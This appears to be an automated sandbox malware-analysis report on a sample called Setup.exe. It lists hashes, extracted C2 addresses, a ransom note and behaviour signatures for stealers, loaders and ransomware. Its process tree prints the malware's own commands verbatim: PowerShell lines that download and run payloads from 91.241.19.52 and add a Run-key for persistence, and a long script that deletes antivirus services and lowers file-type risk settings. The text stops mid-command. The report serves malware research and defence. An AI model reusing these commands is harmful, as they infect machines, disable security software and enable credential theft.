Overview

overview

10

Static

static

Setup.exe

windows7_x64

10

Setup.exe

windows10_x64

Resubmissions

04-06-2023 21:35

230604-1fcwgadg89 10

13-02-2022 03:16

220213-dsq8asfbej 10

13-02-2022 03:12

220213-dqagrsdda9 10

13-02-2022 03:11

220213-dpxwnsfbdq 1

06-12-2021 20:39

211206-zflypsfahr 10

19-10-2021 03:48

211019-ec1mgafbf7 10

11-08-2021 05:28

210811-rjsxfvjxd2 10

11-08-2021 05:07

210811-rs31ylg4ls 10

11-08-2021 04:56

210811-tvaldfm4jx 10

Analysis

  • max time kernel
    293s
  • max time network
    1168s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    11-08-2021 05:28

Sharing

Copy URL
Twitter E-mail

Errors

Reason
Remote task has failed: Machine shutdown
Report Analysis Logs

General

  • Target

    Setup.exe

  • Size

    1.6MB

  • MD5

    ce6eaa52767b2df78b34519231966588

  • SHA1

    ab32d09951189022a1a39e9204ec9ce2926b3fcf

  • SHA256

    40924781ba072ea88bd7cad3f6d2a48e87f370e1c1ee334a3415dd26b5ea17e5

  • SHA512

    36a09fe704823d6db5d0982d761ba1976c940b82b7c1ca650627d66e16b420612b78c761f2ed00e533453eeb2dd7e431cf47b0c2cf826354aa6e779fda531067

Score
10/10
danabotgluptebametasploitraccoonredlinesmokeloadersocelarsvidar921937c8a4bc819c641415a3c45622368953a684036cdbbackdoorbankerdiscoverydropperevasioninfostealerloaderpersistenceransomwarespywarestealersuricatathemidatrojanvmprotect

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://91.241.19.52/Api/GetFile2

Extracted

Path

C:\_readme.txt

Ransom Note
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-jTbSQT8ApY Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: manager@mailtemp.ch Reserve e-mail address to contact us: managerhelper@airmail.cc Your personal ID: 0324gDrgofRiXRqq62TeogIfmpihYZJ6wDmuUVD07WwczX6Bm
Emails

manager@mailtemp.ch

managerhelper@airmail.cc
URLs

https://we.tl/t-jTbSQT8ApY

Extracted

Family

vidar

Version

40

Botnet

921

C2

https://lenak513.tumblr.com/

Attributes
  • profile_id

    921

Extracted

Family

vidar

Version

40

Botnet

937

C2

https://lenak513.tumblr.com/

Attributes
  • profile_id

    937

Extracted

Family

danabot

C2

142.11.244.124:443

142.11.206.50:443
Attributes
  • embedded_hash

    6AD9FE4F9E491E785665E0D144F61DAB

rsa_pubkey.plain
rsa_privkey.plain

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

raccoon

Botnet

c8a4bc819c641415a3c45622368953a684036cdb

Attributes
  • url4cnc

    https://telete.in/jjbadb0y

rc4.plain
rc4.plain

Extracted

Family

smokeloader

Version

2020

C2

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/
rc4.i32
rc4.i32

Signatures

  • Danabot

    Danabot is a modular banking Trojan that has been linked with other malware.

    trojanbankerdanabot
  • Danabot Loader Component 4 IoCs
  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

    loaderdropperglupteba
  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

    trojanbackdoormetasploit
  • Modifies Windows Defender Real-time Protection settings 3 TTPs
    evasiontrojan
  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

    stealerraccoon
  • Raccoon Stealer Payload 2 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 2 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

    stealersocelars
  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Turns off Windows Defender SpyNet reporting 2 TTPs
    evasion
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • Windows security bypass 2 TTPs
    evasiontrojan
  • suricata: ET MALWARE GCleaner Downloader Activity M1

    suricata: ET MALWARE GCleaner Downloader Activity M1

    suricata
  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)

    suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)

    suricata
  • suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)

    suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)

    suricata
  • suricata: ET MALWARE Possible Dridex Download URI Struct with no referer

    suricata: ET MALWARE Possible Dridex Download URI Struct with no referer

    suricata
  • suricata: ET MALWARE Possible Windows executable sent when remote host claims to send a Text File

    suricata: ET MALWARE Possible Windows executable sent when remote host claims to send a Text File

    suricata
  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

    suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

    suricata
  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata
  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata
  • suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2

    suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2

    suricata
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

    evasion
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
    evasion
  • Nirsoft 3 IoCs
  • Vidar Stealer 5 IoCs
    stealer
  • Blocklisted process makes network request 64 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies extensions of user files 2 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • VMProtect packed file 3 IoCs

    Detects executables packed with VMProtect commercial packer.

    vmprotect
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 4 IoCs
  • Loads dropped DLL 40 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
    discovery
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Themida packer 3 IoCs

    Detects Themida, an advanced Windows software protection system.

    themida
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 7 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 4 IoCs
    evasiontrojan
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 15 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Program crash 22 IoCs
  • Drops file in System32 directory 6 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 11 IoCs
  • Drops file in Program Files directory 39 IoCs
  • Drops file in Windows directory 21 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 53 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 6 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Delays execution with timeout.exe 3 IoCs
    evasion
  • Enumerates system info in registry 2 TTPs 8 IoCs
  • Kills process with taskkill 6 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 17 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 14 IoCs
    evasionspywaretrojan
  • Runs ping.exe 1 TTPs 1 IoCs
  • Script User-Agent 10 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:996
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2856
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k SystemNetworkService
          2⤵
            PID:7280
            • C:\Windows\system32\WerFault.exe
              C:\Windows\system32\WerFault.exe -u -p 7280 -s 492
              3⤵
              • Program crash
              PID:1208
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k SystemNetworkService
            2⤵
              PID:6524
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k SystemNetworkService
              2⤵
                PID:8732
                • C:\Windows\system32\WerFault.exe
                  C:\Windows\system32\WerFault.exe -u -p 8732 -s 376
                  3⤵
                  • Program crash
                  PID:6284
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k SystemNetworkService
                2⤵
                  PID:1976
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                  2⤵
                    PID:1908
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k SystemNetworkService
                    2⤵
                      PID:7664
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                      2⤵
                        PID:6600
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                        2⤵
                          PID:5320
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k SystemNetworkService
                          2⤵
                            PID:6936
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                            2⤵
                              PID:8428
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k SystemNetworkService
                              2⤵
                                PID:8684
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                2⤵
                                  PID:9192
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                                  2⤵
                                    PID:7100
                                    • C:\Windows\system32\WerFault.exe
                                      C:\Windows\system32\WerFault.exe -u -p 7100 -s 488
                                      3⤵
                                      • Program crash
                                      PID:5268
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k SystemNetworkService
                                    2⤵
                                      PID:6224
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                                      2⤵
                                        PID:8308
                                        • C:\Windows\system32\WerFault.exe
                                          C:\Windows\system32\WerFault.exe -u -p 8308 -s 496
                                          3⤵
                                          • Program crash
                                          PID:4192
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                                        2⤵
                                          PID:8808
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k SystemNetworkService
                                          2⤵
                                            PID:1308
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                                            2⤵
                                              PID:8764
                                              • C:\Windows\system32\WerFault.exe
                                                C:\Windows\system32\WerFault.exe -u -p 8764 -s 504
                                                3⤵
                                                • Program crash
                                                PID:6776
                                          • c:\windows\system32\svchost.exe
                                            c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                                            1⤵
                                              PID:2804
                                            • c:\windows\system32\svchost.exe
                                              c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                                              1⤵
                                                PID:2796
                                              • c:\windows\system32\svchost.exe
                                                c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                1⤵
                                                  PID:2540
                                                • c:\windows\system32\svchost.exe
                                                  c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                  1⤵
                                                    PID:2504
                                                  • c:\windows\system32\svchost.exe
                                                    c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                    1⤵
                                                      PID:1964
                                                    • C:\Users\Admin\AppData\Local\Temp\Setup.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
                                                      1⤵
                                                      • Checks computer location settings
                                                      • Modifies system certificate store
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:1792
                                                      • C:\Users\Admin\Documents\jQOjjWaHpikcE8hMJLCCcd7V.exe
                                                        "C:\Users\Admin\Documents\jQOjjWaHpikcE8hMJLCCcd7V.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        PID:4396
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\8706794550.exe"
                                                          3⤵
                                                            PID:5268
                                                            • C:\Users\Admin\AppData\Local\Temp\8706794550.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\8706794550.exe"
                                                              4⤵
                                                                PID:6028
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\8706794550.exe"
                                                                  5⤵
                                                                    PID:6452
                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                      timeout /T 10 /NOBREAK
                                                                      6⤵
                                                                      • Delays execution with timeout.exe
                                                                      PID:6808
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im "jQOjjWaHpikcE8hMJLCCcd7V.exe" /f & erase "C:\Users\Admin\Documents\jQOjjWaHpikcE8hMJLCCcd7V.exe" & exit
                                                                3⤵
                                                                  PID:2020
                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                    taskkill /im "jQOjjWaHpikcE8hMJLCCcd7V.exe" /f
                                                                    4⤵
                                                                    • Kills process with taskkill
                                                                    PID:1128
                                                              • C:\Users\Admin\Documents\gYQ2xLKgMc9lQ4OLbLxZeBiq.exe
                                                                "C:\Users\Admin\Documents\gYQ2xLKgMc9lQ4OLbLxZeBiq.exe"
                                                                2⤵
                                                                • Executes dropped EXE
                                                                • Checks SCSI registry key(s)
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious behavior: MapViewOfSection
                                                                PID:4384
                                                              • C:\Users\Admin\Documents\8DqmS760nYTlpJGdjx0JPYJa.exe
                                                                "C:\Users\Admin\Documents\8DqmS760nYTlpJGdjx0JPYJa.exe"
                                                                2⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of WriteProcessMemory
                                                                PID:4372
                                                                • C:\ProgramData\Runtimebroker.exe
                                                                  "C:\ProgramData\Runtimebroker.exe"
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  • Drops startup file
                                                                  PID:4940
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://91.2''+''41''+''.19.5''+''2/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'
                                                                    4⤵
                                                                    • Adds Run key to start application
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:5144
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('http://91.241.19.52/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method
                                                                    4⤵
                                                                    • Blocklisted process makes network request
                                                                    PID:5392
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      "powershell" Get-MpPreference -verbose
                                                                      5⤵
                                                                        PID:6928
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f ) else ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d 